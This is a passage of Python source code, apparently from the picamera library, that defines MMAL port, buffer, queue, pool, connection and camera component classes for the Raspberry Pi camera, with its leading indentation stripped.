:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALVideoPort(MMALPort):
"""
Represents an MMAL port used to pass video data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALVideoPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size,
self.framesize, self.framerate)
else:
return '<MMALVideoPort closed>'
def _get_framesize(self):
return PiResolution(
self._port[0].format[0].es[0].video.crop.width,
self._port[0].format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._port[0].format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = int(value.width)
video.crop.height = int(value.height)
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the port's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_framerate(self):
video = self._port[0].format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
assert video.frame_rate.num == 0
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._port[0].format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
class MMALAudioPort(MMALPort):
"""
Represents an MMAL port used to pass audio data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALAudioPort closed>'
class MMALSubPicturePort(MMALPort):
"""
Represents an MMAL port used to pass sub-picture (caption) data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALSubPicturePort closed>'
class MMALPortParams(object):
"""
Represents the parameters of an MMAL port. This class implements the
:attr:`MMALControlPort.params` attribute.
Internally, the class understands how to convert certain structures to more
common Python data-types. For example, parameters that expect an
MMAL_RATIONAL_T type will return and accept Python's
:class:`~fractions.Fraction` class (or any other numeric types), while
parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
structures will be treated as plain ints.
Parameters that expect more complex structures will return and expect
those structures verbatim.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPortParams, self).__init__()
self._port = port
def __getitem__(self, key):
dtype = PARAM_TYPES[key]
# Use the short-cut functions where possible (teeny bit faster if we
# get some C to do the structure wrapping for us)
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
}.get(dtype, mmal.mmal_port_parameter_get)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_get:
result = dtype(
mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
)
mmal_check(
func(self._port, result.hdr),
prefix="Failed to get parameter %d" % key)
else:
dtype = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
}[dtype]
result = dtype()
mmal_check(
func(self._port, key, result),
prefix="Failed to get parameter %d" % key)
return conv(result)
def __setitem__(self, key, value):
dtype = PARAM_TYPES[key]
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
}.get(dtype, mmal.mmal_port_parameter_set)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_set:
mp = conv(value)
assert mp.hdr.id == key
assert mp.hdr.size >= ct.sizeof(dtype)
mmal_check(
func(self._port, mp.hdr),
prefix="Failed to set parameter %d to %r" % (key, value))
else:
mmal_check(
func(self._port, key, conv(value)),
prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
"""
Represents an MMAL buffer header. This is usually constructed from the
buffer header pointer and is largely supplied to make working with
the buffer's data a bit simpler. Using the buffer as a context manager
implicitly locks the buffer's memory and returns the :mod:`ctypes`
buffer object itself::
def callback(port, buf):
with buf as data:
# data is a ctypes uint8 array with size entries
print(len(data))
Alternatively you can use the :attr:`data` property directly, which returns
and modifies the buffer's data as a :class:`bytes` object (note this is
generally slower than using the buffer object unless you are simply
replacing the entire buffer)::
def callback(port, buf):
# the buffer contents as a byte-string
print(buf.data)
"""
__slots__ = ('_buf',)
def __init__(self, buf):
super(MMALBuffer, self).__init__()
self._buf = buf
def _get_command(self):
return self._buf[0].cmd
def _set_command(self, value):
self._buf[0].cmd = value
command = property(_get_command, _set_command, doc="""\
The command set in the buffer's meta-data. This is usually 0 for
buffers returned by an encoder; typically this is only used by buffers
sent to the callback of a control port.
""")
def _get_flags(self):
return self._buf[0].flags
def _set_flags(self, value):
self._buf[0].flags = value
flags = property(_get_flags, _set_flags, doc="""\
The flags set in the buffer's meta-data, returned as a bitmapped
integer. Typical flags include:
* ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
* ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
* ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
* ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimatation data
""")
def _get_pts(self):
return self._buf[0].pts
def _set_pts(self, value):
self._buf[0].pts = value
pts = property(_get_pts, _set_pts, doc="""\
The presentation timestamp (PTS) of the buffer, as an integer number
of microseconds or ``MMAL_TIME_UNKNOWN``.
""")
def _get_dts(self):
return self._buf[0].dts
def _set_dts(self, value):
self._buf[0].dts = value
dts = property(_get_dts, _set_dts, doc="""\
The decoding timestamp (DTS) of the buffer, as an integer number of
microseconds or ``MMAL_TIME_UNKNOWN``.
""")
@property
def size(self):
"""
Returns the length of the buffer's data area in bytes. This will be
greater than or equal to :attr:`length` and is fixed in value.
"""
return self._buf[0].alloc_size
def _get_offset(self):
return self._buf[0].offset
def _set_offset(self, value):
assert 0 <= value <= self.size
self._buf[0].offset = value
self.length = min(self.size - self.offset, self.length)
offset = property(_get_offset, _set_offset, doc="""\
The offset from the start of the buffer at which the data actually
begins. Defaults to 0. If this is set to a value which would force the
current :attr:`length` off the end of the buffer's :attr:`size`, then
:attr:`length` will be decreased automatically.
""")
def _get_length(self):
return self._buf[0].length
def _set_length(self, value):
assert 0 <= value <= self.size - self.offset
self._buf[0].length = value
length = property(_get_length, _set_length, doc="""\
The length of data held in the buffer. Must be less than or equal to
the allocated size of data held in :attr:`size` minus the data
:attr:`offset`. This attribute can be used to effectively blank the
buffer by setting it to zero.
""")
def _get_data(self):
with self as buf:
return ct.string_at(
ct.byref(buf, self._buf[0].offset),
self._buf[0].length)
def _set_data(self, value):
value_len = buffer_bytes(value)
if value_len:
if value_len > self.size:
raise PiCameraValueError(
'data is too large for buffer (%d > %d)' % (
value_len, self.size))
bp = ct.c_uint8 * value_len
try:
sp = bp.from_buffer(value)
except TypeError:
sp = bp.from_buffer_copy(value)
with self as buf:
ct.memmove(buf, sp, value_len)
self._buf[0].offset = 0
self._buf[0].length = value_len
data = property(_get_data, _set_data, doc="""\
The data held in the buffer as a :class:`bytes` string. You can set
this attribute to modify the data in the buffer. Acceptable values
are anything that supports the buffer protocol, and which contains
:attr:`size` bytes or less. Setting this attribute implicitly modifies
the :attr:`length` attribute to the length of the specified value and
sets :attr:`offset` to zero.
.. note::
Accessing a buffer's data via this attribute is relatively slow
(as it copies the buffer's data to/from Python objects). See the
:class:`MMALBuffer` documentation for details of a faster (but
more complex) method.
""")
def replicate(self, source):
"""
Replicates the *source* :class:`MMALBuffer`. This copies all fields
from the *source* buffer, including the internal :attr:`data` pointer.
In other words, after replication this buffer and the *source* buffer
will share the same block of memory for *data*.
The *source* buffer will also be referenced internally by this buffer
and will only be recycled once this buffer is released.
.. note::
This is fundamentally different to the operation of the
:meth:`copy_from` method. It is much faster, but imposes the burden
that two buffers now share data (the *source* cannot be released
until the replicant has been released).
"""
mmal_check(
mmal.mmal_buffer_header_replicate(self._buf, source._buf),
prefix='unable to replicate buffer')
def copy_from(self, source):
"""
Copies all fields (including data) from the *source*
:class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
store :attr:`length` bytes from the *source* buffer. This method
implicitly sets :attr:`offset` to zero, and :attr:`length` to the
number of bytes copied.
.. note::
This is fundamentally different to the operation of the
:meth:`replicate` method. It is much slower, but afterward the
copied buffer is entirely independent of the *source*.
"""
assert self.size >= source.length
source_len = source._buf[0].length
if source_len:
with self as target_buf, source as source_buf:
ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
self._buf[0].offset = 0
self._buf[0].length = source_len
self.copy_meta(source)
def copy_meta(self, source):
"""
Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
copies all buffer fields with the exception of :attr:`data`,
:attr:`length` and :attr:`offset`.
"""
self._buf[0].cmd = source._buf[0].cmd
self._buf[0].flags = source._buf[0].flags
self._buf[0].dts = source._buf[0].dts
self._buf[0].pts = source._buf[0].pts
self._buf[0].type[0] = source._buf[0].type[0]
def acquire(self):
"""
Acquire a reference to the buffer. This will prevent the buffer from
being recycled until :meth:`release` is called. This method can be
called multiple times in which case an equivalent number of calls
to :meth:`release` must be made before the buffer will actually be
released.
"""
mmal.mmal_buffer_header_acquire(self._buf)
def release(self):
"""
Release a reference to the buffer. This is the opposing call to
:meth:`acquire`. Once all references have been released, the buffer
will be recycled.
"""
mmal.mmal_buffer_header_release(self._buf)
def reset(self):
"""
Resets all buffer header fields to default values.
"""
mmal.mmal_buffer_header_reset(self._buf)
def __enter__(self):
mmal_check(
mmal.mmal_buffer_header_mem_lock(self._buf),
prefix='unable to lock buffer header memory')
return ct.cast(
self._buf[0].data,
ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
def __exit__(self, *exc):
mmal.mmal_buffer_header_mem_unlock(self._buf)
return False
def __repr__(self):
if self._buf is not None:
return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
''.join((
'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
)), {
0: 'none',
mmal.MMAL_EVENT_ERROR: 'error',
mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
mmal.MMAL_EVENT_EOS: 'end-of-stream',
}[self.command], self.length)
else:
return '<MMALBuffer object: ???>'
class MMALQueue(object):
"""
Represents an MMAL buffer queue. Buffers can be added to the queue with the
:meth:`put` method, and retrieved from the queue (with optional wait
timeout) with the :meth:`get` method.
"""
__slots__ = ('_queue', '_created')
def __init__(self, queue):
self._created = False
self._queue = queue
@classmethod
def create(cls):
self = cls(mmal.mmal_queue_create())
self._created = True
return self
def close(self):
if self._created:
mmal_queue_destroy(self._queue)
self._queue = None
def __len__(self):
return mmal.mmal_queue_length(self._queue)
def get(self, block=True, timeout=None):
"""
Get the next buffer from the queue. If *block* is ``True`` (the default)
and *timeout* is ``None`` (the default) then the method will block
until a buffer is available. Otherwise *timeout* is the maximum time to
wait (in seconds) for a buffer to become available. If a buffer is not
available before the timeout expires, the method returns ``None``.
Likewise, if *block* is ``False`` and no buffer is immediately
available then ``None`` is returned.
"""
if block and timeout is None:
buf = mmal.mmal_queue_wait(self._queue)
elif block and timeout is not None:
buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
else:
buf = mmal.mmal_queue_get(self._queue)
if buf:
return MMALBuffer(buf)
def put(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the back of the queue.
"""
mmal.mmal_queue_put(self._queue, buf._buf)
def put_back(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the front of the queue. This is
used when a buffer was removed from the queue but needs to be put
back at the front where it was originally taken from.
"""
mmal.mmal_queue_put_back(self._queue, buf._buf)
class MMALPool(object):
"""
Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
ports are associated with a pool of buffers, and a queue. Instances can be
treated as a sequence of :class:`MMALBuffer` objects but this is only
recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
:meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
the encapsulated :class:`MMALQueue`.
"""
__slots__ = ('_pool', '_queue')
def __init__(self, pool):
self._pool = pool
super(MMALPool, self).__init__()
self._queue = MMALQueue(pool[0].queue)
def __len__(self):
return self._pool[0].headers_num
def __getitem__(self, index):
return MMALBuffer(self._pool[0].header[index])
@property
def queue(self):
"""
The :class:`MMALQueue` associated with the pool.
"""
return self._queue
def close(self):
if self._pool is not None:
mmal.mmal_pool_destroy(self._pool)
self._pool = None
def resize(self, new_count, new_size):
"""
Resizes the pool to contain *new_count* buffers with *new_size* bytes
allocated to each buffer.
*new_count* must be 1 or more (you cannot resize a pool to contain
no headers). However, *new_size* can be 0 which causes all payload
buffers to be released.
.. warning::
If the pool is associated with a port, the port must be disabled
when resizing the pool.
"""
mmal_check(
mmal.mmal_pool_resize(self._pool, new_count, new_size),
prefix='unable to resize pool')
def get_buffer(self, block=True, timeout=None):
"""
Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
for the meaning of the parameters.
"""
return self._queue.get(block, timeout)
def send_buffer(self, port, block=True, timeout=None):
"""
Get a buffer from the pool's queue and send it to *port*. *block* and
*timeout* act as they do in :meth:`get_buffer`. If no buffer is
available (for the values of *block* and *timeout*,
:exc:`~picamera.PiCameraMMALError` is raised).
"""
buf = self.get_buffer(block, timeout)
if buf is None:
raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
port.send_buffer(buf)
def send_all_buffers(self, port, block=True, timeout=None):
"""
Send all buffers from the queue to *port*. *block* and *timeout* act as
they do in :meth:`get_buffer`. If no buffer is available (for the
values of *block* and *timeout*, :exc:`~picamera.PiCameraMMALError` is
raised).
"""
for i in range(len(self._queue)):
self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
"""
Construct an MMAL pool for the number and size of buffers required by
the :class:`MMALPort` *port*.
"""
__slots__ = ('_port',)
def __init__(self, port):
pool = mmal.mmal_port_pool_create(
port._port, port._port[0].buffer_num, port._port[0].buffer_size)
if not pool:
raise PiCameraMMALError(
mmal.MMAL_ENOSPC,
'failed to create buffer header pool for port %s' % port.name)
super(MMALPortPool, self).__init__(pool)
self._port = port
def close(self):
if self._pool is not None:
mmal.mmal_port_pool_destroy(self._port._port, self._pool)
self._port = None
self._pool = None
super(MMALPortPool, self).close()
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_all_buffers(port, block, timeout)
class MMALBaseConnection(MMALObject):
"""
Abstract base class for :class:`MMALConnection` and
:class:`MMALPythonConnection`. Handles weakrefs to the source and
target ports, and format negotiation. All other connection details are
handled by the descendent classes.
"""
__slots__ = ('_source', '_target')
default_formats = ()
compatible_opaque_formats = {
('OPQV-single', 'OPQV-single'),
('OPQV-dual', 'OPQV-dual'),
('OPQV-strips', 'OPQV-strips'),
('OPQV-dual', 'OPQV-single'),
('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
}
def __init__(
self, source, target, formats=default_formats):
super(MMALBaseConnection, self).__init__()
if not isinstance(source, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('source is not a port')
if not isinstance(target, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('target is not a port')
if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
raise PiCameraValueError('source is not an output port')
if target.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError('target is not an input port')
if source.connection is not None:
raise PiCameraValueError('source port is already connected')
if target.connection is not None:
raise PiCameraValueError('target port is already connected')
if formats is None:
formats = ()
self._source = source
self._target = target
try:
iter(formats)
except TypeError:
formats = (formats,)
self._negotiate_format(formats)
source._connection = self
target._connection = self
# Descendents continue with connection implementation...
def close(self):
if self._source is not None:
self._source._connection = None
self._source = None
if self._target is not None:
self._target._connection = None
self._target = None
def _negotiate_format(self, formats):
def copy_format():
self._source.commit()
self._target.copy_from(self._source)
self._target.commit()
def max_buffers():
self._source.buffer_count = self._target.buffer_count = max(
self._source.buffer_count, self._target.buffer_count)
self._source.buffer_size = self._target.buffer_size = max(
self._source.buffer_size, self._target.buffer_size)
# Filter out formats that aren't supported on both source and target
# ports. This is a little tricky as ports that support OPAQUE never
# claim they do (so we have to assume it's mutually supported)
mutually_supported = (
set(self._source.supported_formats) &
set(self._target.supported_formats)
) | {mmal.MMAL_ENCODING_OPAQUE}
formats = [f for f in formats if f in mutually_supported]
if formats:
# If there are any formats left to try, perform the negotiation
# with the filtered list. Again, there's some special casing to
# deal with the incompatible OPAQUE sub-formats
for f in formats:
if f == mmal.MMAL_ENCODING_OPAQUE:
if (self._source.opaque_subformat,
self._target.opaque_subformat) in self.compatible_opaque_formats:
self._source.format = mmal.MMAL_ENCODING_OPAQUE
else:
continue
else:
self._source.format = f
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
continue
else:
max_buffers()
return
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to negotiate port format')
else:
# If no formats are available to try (either from filtering or
# because none were given), assume the source port is set up
# properly. Just copy the format to the target and hope the caller
# knows what they're doing
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to copy source format to target port')
else:
max_buffers()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@property
def source(self):
"""
The source :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._source
@property
def target(self):
"""
The target :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._target
class MMALConnection(MMALBaseConnection):
"""
Represents an MMAL internal connection between two components. The
constructor accepts arguments providing the *source* :class:`MMALPort` and
*target* :class:`MMALPort`.
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
.. note::
The default *formats* list starts with OPAQUE; the class understands
the different OPAQUE sub-formats (see :ref:`mmal` for more information)
and will only select OPAQUE if compatible sub-formats can be used on
both ports.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALConnection` object
sending the data, and the :class:`MMALBuffer` object containing data. The
callable may optionally manipulate the :class:`MMALBuffer` and return it
to permit it to continue traversing the connection, or return ``None``
in which case the buffer will be released.
.. note::
There is a significant performance penalty for specifying a
callback between MMAL components as it requires buffers to be
copied from the GPU's memory to the CPU's memory and back again.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between MMAL components.
"""
__slots__ = ('_connection', '_callback', '_wrapper')
default_formats = (
mmal.MMAL_ENCODING_OPAQUE,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not isinstance(source, MMALPort):
raise PiCameraValueError('source is not an MMAL port')
if not isinstance(target, MMALPort):
raise PiCameraValueError('target is not an MMAL port')
super(MMALConnection, self).__init__(source, target, formats)
self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
self._callback = callback
flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
if callback is None:
flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
try:
mmal_check(
mmal.mmal_connection_create(
self._connection, source._port, target._port, flags),
prefix="Failed to create connection")
except:
self._connection = None
raise
def close(self):
if self._connection is not None:
mmal.mmal_connection_destroy(self._connection)
self._connection = None
self._wrapper = None
super(MMALConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return bool(self._connection[0].is_enabled)
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
def wrapper(connection):
buf = mmal.mmal_queue_get(connection[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
modified_buf = self._callback(self, buf)
except:
buf.release()
raise
else:
if modified_buf is not None:
try:
self._target.send_buffer(modified_buf)
except PiCameraPortDisabled:
# Target port disabled; ignore the error
pass
else:
buf.release()
return
buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
self._source.send_buffer(buf)
except PiCameraPortDisabled:
# Source port has been disabled; ignore the error
pass
if self._callback is not None:
self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
self._connection[0].callback = self._wrapper
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
mmal_check(
mmal.mmal_connection_enable(self._connection),
prefix="Failed to enable connection")
if self._callback is not None:
MMALPool(self._connection[0].pool).send_all_buffers(self._source)
def disable(self):
"""
Disables the connection.
"""
mmal_check(
mmal.mmal_connection_disable(self._connection),
prefix="Failed to disable connection")
self._wrapper = None
@property
def name(self):
return self._connection[0].name.decode('ascii')
def __repr__(self):
if self._connection is not None:
return '<MMALConnection "%s">' % self.name
else:
return '<MMALConnection closed>'
class MMALRawCamera(MMALBaseComponent):
"""
The MMAL "raw camera" component.
Don't use this! If you insist on using this anyway, read the forum post
about `raw sensor access`_ first.
.. raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
opaque_input_subformats = ()
opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
"""
Represents the MMAL camera component. This component has 0 input ports and
3 output ports. The intended use of the output ports (which in turn
determines the behaviour of those ports) is as follows:
* Port 0 is intended for preview renderers
* Port 1 is intended for video recording
* Port 2 is intended for still image capture
Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
obtain and manipulate the camera's configuration.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
annotate_structs = (
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
)
def __init__(self):
global FIX_RGB_BGR_ORDER
super(MMALCamera, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
found = False
# try largest struct to smallest as later firmwares still happily
# accept earlier revision structures
# XXX do old firmwares reject too-large structs?
for struct in reversed(MMALCamera.annotate_structs):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
if FIX_RGB_BGR_ORDER is None:
# old firmware lists BGR24 before RGB24 in supported_formats
for f in self.outputs[1].supported_formats:
if f == mmal.MMAL_ENCODING_BGR24:
FIX_RGB_BGR_ORDER = True
break
elif f == mmal.MMAL_ENCODING_RGB24:
FIX_RGB_BGR_ORDER = False
break
def _get_annotate_rev(self):
try:
return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
def _set_annotate_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
The annotation capabilities of the firmware have evolved over time and
several structures are available for querying and setting video
annotations. By default the :class:`MMALCamera` class will pick the
latest annotation structure supported by the current firmware but you
can select older revisions with :attr:`annotate_rev` for other purposes
(e.g. testing).
""")
class MMALCameraInfo(MMALBaseComponent):
"""
Represents the MMAL camera-info component. Query the
``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
information about the connected camera module.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
info_structs = (
mmal.MMAL_PARAMETER_CAMERA_INFO_T,
mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
)
def __init__(self):
super(MMALCameraInfo, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
found = False
# try smallest structure to largest as later firmwares reject
# older structures
for struct in MMALCameraInfo.info_structs:
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _get_info_rev(self):
try:
return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
except IndexError:
